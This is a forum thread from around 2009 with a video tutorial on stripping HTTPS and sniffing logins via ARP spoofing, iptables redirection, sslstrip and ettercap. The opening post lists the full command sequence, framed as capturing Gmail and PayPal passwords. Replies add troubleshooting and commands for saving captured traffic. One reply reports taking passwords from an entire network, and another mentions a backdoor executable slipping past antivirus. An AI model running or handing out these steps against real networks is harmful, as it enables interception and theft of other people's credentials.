Page 1 of 3 123 LastLast
Results 1 to 10 of 71

Thread: [Video+Tutorial] How to: Crack snifff SSL / HTTPS (sslstrip)

Hybrid View

  1. #1

    Arrow [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/download.php?ykgjnkyejku
    Commands: http://pastebin.com/fd6eadf7


    What is this?

    This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
    > Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
    > SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Targets IP: 192.168.1.6
    Gateway : 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/ettercap.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0


    Notes:

    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!
    Video length: 03:55

    Capture length: 4:41
    Song: 16 Bit Lolitas - Nobody Seems To Care

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
    Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    7

    Default

    Very nice tut - keep up the good work

  3. #3
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    1

    Default

    Didn't work for me, but the target machine was running Ubuntu 9.04. It appears as if Ubuntu simply didn't accept the ARP spoof. However if I reversed the arp spoof (arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100), the target machine couldn't reach the network (obviously, since the router attempted to route traffic from the target to my attacking machine).

    Is Ubuntu just not susceptible to this type of attack, or am I doing something wrong?

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by VillageIdiot View Post
    Didn't work for me, but the target machine was running Ubuntu 9.04. It appears as if Ubuntu simply didn't accept the ARP spoof. However if I reversed the arp spoof (arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100), the target machine couldn't reach the network (obviously, since the router attempted to route traffic from the target to my attacking machine).

    Is Ubuntu just not susceptible to this type of attack, or am I doing something wrong?
    Sounds like you didn't pass the packet forward through your machine.

    Try typing "arp -a" on your ubuntu machine to see if the MAC changes before and then during the spoof.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Member mixit's Avatar
    Join Date
    Jan 2010
    Posts
    104

    Default Thanks

    Thanks for the great tutorial! Followed this tutorial exactly and it worked seamlessly. No error messages appeared on the target computers and there was very little network slowdown. Also i tried setting 192.168.1.255 as the target and i was able to retrieve passwords from the entire network.

    The target machines I tested against included a Vista laptop with Mozilla 3.0 and an XP desktop sp3 with Mozilla 3.0

  6. #6
    Junior Member
    Join Date
    Dec 2007
    Posts
    88

    Default

    Cool tutorial !!

    Now I'm worried. I go to internet cafes often.

    1. Is there anyway to detect if someone is arp spoofing my traffic (assuming I'm the victim) ?
    2. As suggested in a previous post, can someone capture all wifi traffic and later decrypt, replay on i lo and get the username and passwords ? If so, does the victim have any tools to prevent this ?

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Nice tut... one small point - the exe for backdoor is getting cought by AV as trojan... grrrrr It can escape from half of the AV in Virustotal but .....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8
    Just burned his ISO imported_evanuz's Avatar
    Join Date
    Dec 2008
    Posts
    2

    Default

    How do i save the packets?

  9. #9

    Default

    Nice work, thanks for posting.

    Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  10. #10

    Default

    Quote Originally Posted by kazalku View Post
    Nice tut... one small point - the exe for backdoor is getting cought by AV as trojan... grrrrr It can escape from half of the AV in Virustotal but .....
    kazalku,
    Thanks! But i'm not using SBD this time around! Plus I dont have any AV running on my targets PC!

    evanuz,
    I use:
    sslstrip -a -k -f --write /root/output-ssl
    You can then do
    kate /root/output-ssl
    OR
    less /root/output-ssl
    OR
    nano /root/output-ssl | grep [username]
    freemymind,
    Thanks for the thanks!
    The music cuts out!? :O *goes and checks*


    Edit:
    Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •